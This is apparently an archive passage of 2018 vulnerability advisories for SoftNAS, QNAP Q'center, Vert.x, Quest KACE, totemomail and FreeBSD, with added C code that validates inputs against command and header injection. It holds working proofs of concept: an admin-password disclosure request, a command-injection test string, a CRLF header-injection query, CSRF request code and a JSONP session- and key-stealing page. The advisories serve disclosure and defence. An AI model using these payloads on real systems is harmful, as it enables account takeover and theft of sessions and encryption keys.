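            return 0;
        v++;                                /* a digit group must follow the dot */
    }
    return parts == 3;
}

/*
 * Build an argument vector for the helper instead of a shell command line.
 * Every parameter is one argv element, so no metacharacter in 'version' can
 * split or extend the command.  Returns the argument count, or -1 when a
 * parameter fails validation.  'av' must have room for 6 pointers.
 */
int build_update_argv(const char *version, const char *type, char *av[])
{
    if (!is_valid_version(version))
        return -1;
    /* hypothetical allow-list of update types */
    if (strcmp(type, "standard") != 0 && strcmp(type, "beta") != 0)
        return -1;
    av[0] = UPDATE_HELPER;
    av[1] = "--version";
    av[2] = (char *)version;
    av[3] = "--type";
    av[4] = (char *)type;
    av[5] = NULL;
    return 5;
}

/* Run av directly with execv(): no /bin/sh, no quoting, no expansion.
 * Returns the child's exit status, or -1 if it could not be run. */
int run_without_shell(char *const av[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(av[0], av);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *av[6];
    /* Constructed inputs: a legitimate version and the shape of an injection attempt. */
    printf("4.0.3 -> %d\n", build_update_argv("4.0.3", "standard", av));
    printf("3.6aaa.1aaa;echo x -> %d\n", build_update_argv("3.6aaa.1aaa;echo x", "standard", av));
    return 0;
}
```

Pairing this with a sudoers entry that names only the helper binary, rather than `Cmnd_Alias SOFTNAS = ALL` as in the excerpt above, means a remaining bug in the web tier no longer hands out root.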

8. *Report Timeline*
2018-05-29: Core Security sent an initial notification to SoftNAS,
including a draft advisory.
2018-05-31: SoftNAS confirmed the reported vulnerability and informed
they were working on a plan to fix the issue.
2018-05-31: Core Security thanked SoftNAS for the reply.
2018-06-15: Core Security requested a status update.
2018-06-26: SoftNAS answered saying the fixed version was scheduled for
late July.
2018-06-26: Core Security thanked SoftNAS for the update.
2018-07-16: Core Security asked for a status update and requested a
solidified release date.
2018-07-16: SoftNAS informed Core Security that the new release was under
QA verification and that they would have the release date during the week.
2018-07-19: SoftNAS notified Core Security that SoftNAS Cloud 4.0.3
version was already available.
2018-07-19: Core Security thanked SoftNAS's update and set July 26th as
the publication date.
2018-07-26: Advisory CORE-2018-0009 published.

9. *References*

[1] https://www.softnas.com

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies. We conduct our research in several important areas of
computer security including system vulnerabilities, cyber attack
planning and simulation, source code auditing, and cryptography. Our
results include problem

[CORE-2018-0006] - QNAP Qcenter Virtual Appliance Multiple Vulnerabilities

2018-07-12 Thread Core Security Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

QNAP Qcenter Virtual Appliance Multiple Vulnerabilities

1. *Advisory Information*

Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0006
Advisory URL:
http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities
Date published: 2018-07-11
Date of last update: 2018-07-11
Vendors contacted: QNAP
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Information Exposure [CWE-200], Command Injection [CWE-77],
Command Injection [CWE-77], Command Injection [CWE-77],
Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709,
CVE-2018-0710

3. *Vulnerability Description*

QNAP's website states that:

[1] Q'center Virtual Appliance is a central management platform that
enables you to consolidate the management of multiple QNAP NAS. The
Q'center web interface gives you the ease-of-use, cost-efficiency,
convenience and flexibility to manage multiple NAS, across multiple
sites, from any internet browser.

The platform provides centralized web-based administration to manage
the following features:

- Review HDD S.M.A.R.T. values
- Monitor system status
- Manage apps and shared folders
- Review infographic reports

Multiple vulnerabilities were found in the Q'center Virtual Appliance
web console that would allow an attacker to execute arbitrary commands
on the system.

4. *Vulnerable versions*

. Q'center Virtual Appliance Version 1.6.1056 (20170825)
. Q'center Virtual Appliance Version 1.6.1075 (20171123)
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

QNAP  published the following Security Note:

. https://www.qnap.com/en-us/security-advisory/nas-201807-10

6. *Credits*

These vulnerabilities were discovered and researched by Ivan Huertas
from Core Security Consulting Services. The publication of this advisory
was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

QNAP's Q'center Virtual Appliance web console includes a functionality
that would allow an authenticated attacker to elevate privileges on the
system. We describe this issue in section 7.1.

Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command
execution.

7.1. *Privilege escalation*

[CVE-2018-0706]
The application contains an API endpoint that returns information about
the accounts defined in the database. The information returned is
informative for all the users except for the admin user, which comes
with every installation, where an extra field is presented. This extra
field (new_password) contains the password defined at installation time
for the admin user, encoded in base64.

Any authenticated user could access this API endpoint and retrieve the
admin user's password, and therefore log in as an administrator.

The following proof of concept shows a user with viewer access
retrieving the admin's password encoded in base64 in the new_password
field.

/-
GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432;
_ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false
Connection: close

HTTP/1.1 200 OK
Date: Thu, 01 Mar 2018 19:23:43 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: application/json
Content-Length: 878
Connection: close

{
"total_count": 2,
"account": [
{
"dst_enable": false,
"name": "admin",
"default": true,
"new_password": "YWRtaW5pc3RyYWRvcg==",
"authentication": 0,
"create_time": {
"$date": 1519917983616
},
"role": 4294967295,
"timezone_code": 17,
"last_login": {
"$date": 1519929869797
},
"_id": "5a981b9f3af7e2030c883592",
"email": "",
"description": "administrator"
},
{
"dst_enable": false,
"name": "viewer",
"register_code": "",
"authentication": 0,
"create_time": {
"$date": 1519929122332
},
"role": 1082130432,
"timezone_code": 17,
"last_login": {
"$date": 1519932215818
},
"_id": "5a9847223af7e2034924e7b6",
"email": "",
"description&

FreeBSD Security Advisory FreeBSD-SA-18:07.lazyfpu

2018-06-21 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-18:07.lazyfpu                                    Security Advisory
                                                          The FreeBSD Project

Topic:          Lazy FPU State Restore Information Disclosure

Category:       core
Module:         kernel
Announced:      2018-06-21
Credits:        Julian Stecklina from Amazon Germany
                Thomas Prescher from Cyberus Technology GmbH
                Zdenek Sojka from SYSGO AG
                Colin Percival
Affects:        All supported versions of FreeBSD.
Corrected:      2018-06-14 18:50:49 UTC (stable/11, 11.2-PRERELEASE)
                2018-06-15 13:21:37 UTC (releng/11.2, 11.2-RC3)
                2018-06-21 05:17:13 UTC (releng/11.1, 11.1-RELEASE-p11)
CVE Name:       CVE-2018-3665

Special Note:   This advisory only addresses this issue for FreeBSD 11.x on
                i386 and amd64.  We expect to update this advisory to include
                10.x in the near future.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

Modern CPUs have a floating point unit (FPU) which needs to maintain state
per thread.  One technique is to only save and to only restore the FPU state
for a thread when a thread attempts to utilize the FPU.  This technique is
called Lazy FPU state restore.

II.  Problem Description

A subset of Intel processors can allow a local thread to infer data from
another thread through a speculative execution side channel when Lazy FPU
state restore is used.

III. Impact

Any local thread can potentially read FPU state information from other
threads running on the host.  This could include cryptographic keys when the
AES-NI CPU feature is present.

IV.  Workaround

No workaround is available, but non-Intel branded CPUs are not believed
to be vulnerable.

V.   Solution

The patch changes from Lazy FPU state restore to Eager FPU state restore.
This new technique is the recommended practice from Intel and in some cases
can actually increase performance, depending on workload.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:07/lazyfpu-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:07/lazyfpu-11.patch.asc
# gpg --verify lazyfpu-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/11/                                                        r335169
releng/11.2/                                                      r335196
releng/11.1/                                                      r335465
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00145.html>

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3665>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:07.lazyfpu.asc>

CSNC-2018-021 - Vert.x - HTTP Header Injection

2018-06-13 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:   Vert.x [1]
# CSNC ID:   CSNC-2018-021
# Subject:   HTTP Header Injection
# Risk:  Medium
# Effect:Remotely exploitable
# Author:Lukasz D. (advisor...@compass-security.com)
# Date:  12.06.2018
#
#

Introduction:
-
Eclipse Vert.x is a tool-kit for building reactive applications on the JVM.
Vert.x can be used for simple network utilities, sophisticated modern web
applications, HTTP/REST microservices, high volume event processing
or full-blown back-end message-bus applications. Vert.x is used by many
different companies, from real-time gaming to banking and everything in between.

Vert.x does not filter carriage return and line feed characters from the
values of HTTP response headers it sets. This allows an attacker to
manipulate the values of headers set by the application and to add
arbitrary new headers. In particular, issuing a redirect and manipulating
cookies set by the server is possible.

Affected:
-
The following Vert.x versions are vulnerable:
- 3.0.0 - 3.5.1

Technical Description:
--
The method putHeader(String name, String value) used to set new headers in the
HTTP response does not filter carriage return and line feed characters from
the header value. If a web application uses a user-provided parameter as
the value of a header, then it is possible for a user to add new HTTP headers
of their choice.

For example, a Vert.x-based web application may use the vulnerable method like
this: putHeader("User-Header", foo), where foo is the user-provided parameter.

Then:
Requesting /vulnerable?foo=bar will add a header: "User-Header: bar".
Requesting /vulnerable?foo=bar%0D%0ASet-Cookie:%20mycookie=hello will add
a header: "User-Header: bar" and additionally will set a new cookie
with name "mycookie" and value "hello".

Workaround / Fix:
-
It needs to be ensured that every header value which is set based on
a user-provided parameter does not contain carriage return and line feed
characters.
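An added example, in C rather than Java and not Compass Security's or Vert.x's code, of the check the fix requires: a percent-decoder to recover what the application receives for the two requests above, and a header emitter that refuses any value containing CR or LF. Function names are chosen here; the inputs are the query values quoted in the advisory.

```c
#include <stdio.h>
#include <string.h>

/* Value of a hex digit for percent-decoding, or -1 if not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    c |= 0x20;                                /* fold to lower case */
    if (c >= 'a' && c <= 'f')
        return c - 'a' + 10;
    return -1;
}

/*
 * Percent-decode a query parameter the way the server does before handing
 * it to the application.  Returns the decoded length, or -1 on a malformed
 * escape or when the result does not fit in 'cap' bytes.
 */
int url_decode(const char *in, char *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        int c = (unsigned char)in[i];
        if (c == '%') {
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)in[i + 2]);
            if (hi < 0 || lo < 0)
                return -1;
            c = hi * 16 + lo;
            i += 2;
        } else if (c == '+') {
            c = ' ';
        }
        if (o + 1 >= cap)
            return -1;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return (int)o;
}

/*
 * Accept a header value only if it contains no CR, LF, NUL or other control
 * character (HTAB excepted, as RFC 7230 field-content allows it).  This is
 * the check a putHeader() wrapper needs before a user-supplied value is sent.
 */
int header_value_is_safe(const char *value)
{
    for (const unsigned char *p = (const unsigned char *)value; *p != '\0'; p++) {
        if (*p == '\r' || *p == '\n')
            return 0;                         /* would end the header line */
        if (*p < 0x20 && *p != '\t')
            return 0;
        if (*p == 0x7f)
            return 0;
    }
    return 1;
}

/*
 * Emit "Name: value\r\n" into buf, but only for a safe name and value.
 * Returns the number of bytes written, or -1 with buf left empty when the
 * value is rejected or does not fit.
 */
int put_header_checked(char *buf, size_t cap, const char *name, const char *value)
{
    int n;
    if (cap == 0)
        return -1;
    buf[0] = '\0';
    if (!header_value_is_safe(name) || !header_value_is_safe(value))
        return -1;
    n = snprintf(buf, cap, "%s: %s\r\n", name, value);
    if (n < 0 || (size_t)n >= cap) {
        buf[0] = '\0';
        return -1;
    }
    return n;
}

int main(void)
{
    /* The two query values from the advisory, as the application would see them. */
    char decoded[128], line[128];
    url_decode("bar", decoded, sizeof decoded);
    printf("foo=bar -> %s\n",
           put_header_checked(line, sizeof line, "User-Header", decoded) < 0 ? "rejected" : "emitted");
    url_decode("bar%0D%0ASet-Cookie:%20mycookie=hello", decoded, sizeof decoded);
    printf("foo=bar%%0D%%0A... -> %s\n",
           put_header_checked(line, sizeof line, "User-Header", decoded) < 0 ? "rejected" : "emitted");
    return 0;
}
```

Rejecting the request outright (an HTTP 400) is the right response here; stripping the CR and LF silently would leave "Set-Cookie: mycookie=hello" inside the value, which is harmless on the wire but hides the attempt from logs.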

Timeline:
-
2018-02-22:   Vulnerability discovered
2018-04-04:   Initial vendor notification
2018-04-04:   Initial vendor response
2018-06-04:   Patched version released
2018-06-13:   Public disclosure

References:
---
[1]: https://vertx.io/


[CORE-2018-0004] - Quest KACE System Management Appliance Multiple Vulnerabilities

2018-06-03 Thread Core Security Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Quest KACE System Management Appliance Multiple Vulnerabilities

1. *Advisory Information*

Title: Quest KACE System Management Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0004
Advisory URL:
http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities
Date published: 2018-05-31
Date of last update: 2018-05-22
Vendors contacted: Quest Software Inc.
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege
Management [CWE-269], Improper Privilege Management [CWE-269], Improper
Authorization [CWE-285], Improper Neutralization of Special Elements used
in an SQL Command [CWE-89], Improper Neutralization of Special Elements
used in an SQL Command [CWE-89], Improper Neutralization of Input During
Web Page Generation [CWE-79], External Control of File Name or Path
[CWE-73], External Control of File Name or Path [CWE-73]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,
CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,
CVE-2018-11133,
CVE-2018-11137, CVE-2018-11141

3. *Vulnerability Description*

From Quest KACE's website:

"The KACE Systems Management Appliance [1] provides
your growing organization with comprehensive management of network-connected
devices, including servers, PCs, Macs, Chromebooks, tablets, printers,
storage, networking gear and the Internet of Things (IoT). KACE can fulfill
all of your organization's systems management needs, from initial deployment
to ongoing management and retirement."

Multiple vulnerabilities were found in the Quest KACE System Management
Virtual Appliance that would allow a remote attacker to gain command
execution as root. We present three vectors to achieve this, including
one that can be exploited as an unauthenticated user.

Additional web application vulnerabilities were found in the web console
that is bundled with the product. These vulnerabilities are detailed in
section 7.

Note: This advisory has limited details on the vulnerabilities because
during the attempted coordinated disclosure process, Quest advised us not
to distribute our original findings to the public or else they would
take legal action. Quest's definition of "responsible disclosure" can be
found at
https://support.quest.com/essentials/reporting-security-vulnerability.

CoreLabs has been publishing security advisories since 1997 and believes
in coordinated disclosure and good faith collaboration with software vendors
before disclosure to help ensure that a fix or workaround solution is ready
and available when the vulnerability details are publicized. We believe
that providing technical details about each finding is necessary to provide
users and organizations with enough information to understand the
implications of the vulnerabilities against their environment and, most
importantly, to prioritize the remediation activities aiming at mitigating
risk.

We regret Quest's posture on disclosure during the whole process (detailed
in the Report Timeline section) and the lack of any possibility of agreeing
on a coordinated publication date, something we achieve (and have
achieved) with many vendors as part of our coordinated disclosure practices.

4. *Vulnerable Packages*

. Quest KACE System Management Appliance 8.0 (Build 8.0.318)
Other products and versions might be affected too, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Quest reports that it has released the security vulnerability patch
SEC2018_20180410 to address the reported vulnerabilities.
The patch can be downloaded at
https://support.quest.com/download-install-detail/6086148.

For more details, Quest published the following Security Note:
https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan
and Guido Leo from Core Security Consulting Services. The publication of
this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Quest KACE SMA ships with a web console that provides administrators and
users with several features. Multiple vulnerabilities were found in the
context of this console, both from an authenticated and unauthenticated
perspective.

Section 7.1 describes how an unauthenticated attacker could gain command
execution on the system as the web server user.

Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code
execution but would require the attacker to have a valid authentication
toke

[CORE-2018-0002] - Quest DR Series Disk Backup Multiple Vulnerabilities

2018-06-03 Thread Core Security Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Quest DR Series Disk Backup Multiple Vulnerabilities

1. *Advisory Information*

Title: Quest DR Series Disk Backup Multiple Vulnerabilities
Advisory ID: CORE-2018-0002
Advisory URL:
http://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities
Date published: 2018-05-31
Date of last update: 2018-05-22
Vendors contacted: Quest Software Inc.
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-11143, CVE-2018-11144, CVE-2018-11145, CVE-2018-11146,
CVE-2018-11147, CVE-2018-11148, CVE-2018-11149, CVE-2018-11150, CVE-2018-11151,
CVE-2018-11152, CVE-2018-11153, CVE-2018-11154, CVE-2018-11155, CVE-2018-11156,
CVE-2018-11157, CVE-2018-11158, CVE-2018-11159, CVE-2018-11160, CVE-2018-11161,
CVE-2018-11162, CVE-2018-11163, CVE-2018-11164, CVE-2018-11165, CVE-2018-11166,
CVE-2018-11167, CVE-2018-11168, CVE-2018-11169, CVE-2018-11170, CVE-2018-11171,
CVE-2018-11172, CVE-2018-11173, CVE-2018-11174, CVE-2018-11175, CVE-2018-11176,
CVE-2018-11177, CVE-2018-11178, CVE-2018-11179, CVE-2018-11180,
CVE

CSNC-2018-003 totemomail Encryption Gateway - Cross-Site Request Forgery

2018-05-15 Thread Advisories

#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#

#
# Product:  totemomail Encryption Gateway
# Vendor:   totemo AG
# CSNC ID:  CSNC-2018-003
# CVE ID:   CVE-2018-6563
# Subject:  Cross-Site Request Forgery
# Risk: High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger <nicolas.heini...@compass-security.com>
# Date: 14.05.2018
#


Introduction:
-
The totemomail Encryption Gateway protects email communication with any external
partner by encryption. It doesn't matter whether you exchange emails with
technically savvy communication partners or with those who have neither an
appropriate infrastructure nor the necessary know-how. The encryption gateway
also makes it easy to securely send very large attachments.[1]

Compass Security discovered a vulnerability in the webmail part of the
solution. It is possible to predict all parameters that are required to
execute actions on the webmail interface. This allows an attacker to perform
Cross-Site Request Forgery (CSRF) attacks. The attacker needs to craft a
malicious web page that automatically sends a request to the Encryption
Gateway. If the user is logged in, the request will be executed by the
Encryption Gateway on behalf of the logged-in user. This could be used to
change a user's settings, send emails or change contact information.


Affected:
-
Vulnerable:
 * 6.0.0_Build_371

No other version was tested but it is likely that older versions are affected as
well.


Technical Description
-
In the webmail, no anti-CSRF token is used. Although the viewState makes the
attack more complex, it is possible to entirely predict the requests and thus
perform CSRF attacks. The requirement here is to perform the attack as a replay
of a full user interaction: one has to replay every request to make sure that
the viewState is updated on the server side and corresponds to the action that
is performed by the malicious page.

Such a malicious page is presented below; it automatically sends three requests
that change the user's details:
==
  function submitRequest1()
  {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/webmail\/newMessage.xhtml", true);
    xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
    xhr.withCredentials = true;
    var body = "tabNavigationForm_SUBMIT=1&javax.faces.ViewState=An36[CUT BY COMPASS]XBJn&tabNavigationForm_j_id_24_j_id_26=tabNavigationForm$
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
      aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
  }

  function submitRequest2()
  {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
    xhr.setRequestHeader("Accept", "application\/xml, text\/xml, *\/*; q=0.01");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true;
    var body = "javax.faces.partial.ajax=true&javax.faces.source=preferencesForm_phoneNumber_input_text&javax.faces.partial.execute=preferencesForm_phoneNumber_input_tex$
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
      aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
  }

  function submitRequest3()
  {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
    xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
    xhr.withCredentials = true;
    var body = "preferencesForm_firstname_input_text=CSRF&preferencesForm_lastname_input_text=CSRF&preferencesForm_phoneNumber_input_text=%2B41+00+000+00+00&preferencesF

CSNC-2018-002 totemomail Encryption Gateway - JSONP hijacking

2018-05-15 Thread Advisories

#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#

#
# Product:  totemomail Encryption Gateway
# Vendor:   totemo AG
# CSNC ID:  CSNC-2018-002
# CVE ID:   CVE-2018-6562
# Subject:  JSONP hijacking
# Risk: High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger <nicolas.heini...@compass-security.com>
# Date: 14.05.2018
#


Introduction:
-
The totemomail Encryption Gateway protects email communication with any external
partner by encryption. It doesn't matter whether you exchange emails with
technically savvy communication partners or with those who have neither an
appropriate infrastructure nor the necessary know-how. The encryption gateway
also makes it easy to securely send very large attachments.[1]

Compass Security discovered a vulnerability in the process of decrypting
a secure message sent to an external partner. This issue could lead to the
user's session on the gateway being stolen. The encryption material for the
encrypted email could also be stolen in the same way.


Affected:
-
Vulnerable:
 * 6.0.0_Build_371

No other version was tested but it is likely that older versions are affected as
well.


Technical Description
-
When sending an encrypted email to a recipient outside of the organization,
totemomail Encryption Gateway sends a so-called Envelope Message that includes
an HTML file with the encrypted content and JavaScript to get the key from the
gateway to decrypt the content. The key material is provided by the gateway
through a JSONP callback that must be either authenticated using the email and
password in the POST request or with an existing session ID. An example is
provided below:
==
GET /responsiveUI/EnvelopeOpenServlet?envelopeAction=decryptionKey
=160_1=jsonpCallback=[CUT BY COMPASS]
=[CUT BY COMPASS]=&_=1515597892513 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=EF8E33D6DAD75F0394381AB7084DEA2D; oam.Flash.RENDERMAP.TOKEN=uy9dqvc4a
Connection: close
==

The response contains the key material as well as the session ID:
==
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 206
Date: Wed, 10 Jan 2018 15:26:17 GMT

jsonpCallback({"iv": "AJD[CUT BY COMPASS]w==",
"key": "OYP[CUT BY COMPASS]w=", "cipher": "AES\/CBC\/PKCS5Padding",
"keyAlgo": "AES", "session": "EF8E33D6DAD75F0394381AB7084DEA2D"});
==

The problem arises because the same request is accepted if a session already
exists on the Encryption Gateway. In this case, the username and password are
not required. This enables an attacker to create a malicious web page that will
define a JavaScript function 'jsonpCallback' and insert a script tag with the
source on the Encryption Gateway. This way, it is possible to retrieve the
response in the callback if a logged in user visits the malicious page.

An example of such a malicious page is given below, note that the user, password
and mtan parameters are not required:
==
<html>
<head>
<title>JSONP data and session stealing PoC</title>
<script>
function jsonpCallback(obj) {
    document.write('<p>Your data is:</p>');
    document.write('<code>' + JSON.stringify(obj) + '</code>');
}
</script>
</head>
<body>
<h1>JSONP data and session stealing PoC</h1>
<script src="https://[CUT BY COMPASS]/responsiveUI/EnvelopeOpenServlet?envelopeAction=decryptionKey&messageId=160_1"></script>
</body>
</html>
==

The only remaining obstacle is guessing the message ID, but as far as Compass
was able to observe it is kept in the form XXX_YY, where XXX is a 3-digit number
and YY a 1- or 2-digit number. This small space allows a brute-force attack even
over the Internet.


Workaround / Fix:
-
Install an up to date version of totemomail Encryption Gateway.

As a developer, JSONP callbacks should not include sensitive information. If
they need to, the request must include an unpredictable element. In this case a
possibility would be to require the email and the password of the user even if
the session is open.


Timeline:
-
2018-05-14: Coordinated public disclosure date
2018-04-XX: Release of fixed version 6.0_b567
2018-02-13: Initial vendor response
2018-02-09: Initial vendor notification
2018-02-02: Assigned CVE-2018-6562
2018-01-10: Discovery by Nicolas Heiniger


References:
---
[1] https://www.totemo.com/en/solutions/email-encryption/external-encryption


FreeBSD Security Advisory FreeBSD-SA-18:06.debugreg

2018-05-08 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:06.debugreg   Security Advisory
  The FreeBSD Project

Topic:  Mishandling of x86 debug exceptions

Category:   core
Module: kernel
Announced:  2018-05-08
Credits:Nick Peterson, Everdox Tech LLC
https://www.linkedin.com/in/everdox
Andy Lutomirski
Affects:All supported versions of FreeBSD.
Corrected:  2018-05-08 17:03:33 UTC (stable/11, 11.2-PRERELEASE)
2018-05-08 17:12:10 UTC (releng/11.1, 11.1-RELEASE-p10)
2018-05-08 17:05:39 UTC (stable/10, 10.4-STABLE)
2018-05-08 17:12:10 UTC (releng/10.4, 10.4-RELEASE-p9)
CVE Name:   CVE-2018-8897

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

On x86 architecture systems, the stack is represented by the combination of
a stack segment and a stack pointer, which must remain in sync for proper
operation.  Instructions related to manipulating the stack segment have
special handling to facilitate consistency with changes to the stack pointer.

II.  Problem Description

The MOV SS and POP SS instructions inhibit debug exceptions until the
instruction boundary following the next instruction.  If that instruction is
a system call or similar instruction that transfers control to the operating
system, the debug exception will be handled in the kernel context instead of
the user context.

III. Impact

An authenticated local attacker may be able to read sensitive data in kernel
memory, control low-level operating system functions, or may panic the
system.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
using either a binary or source code patch, and then reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

And reboot.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
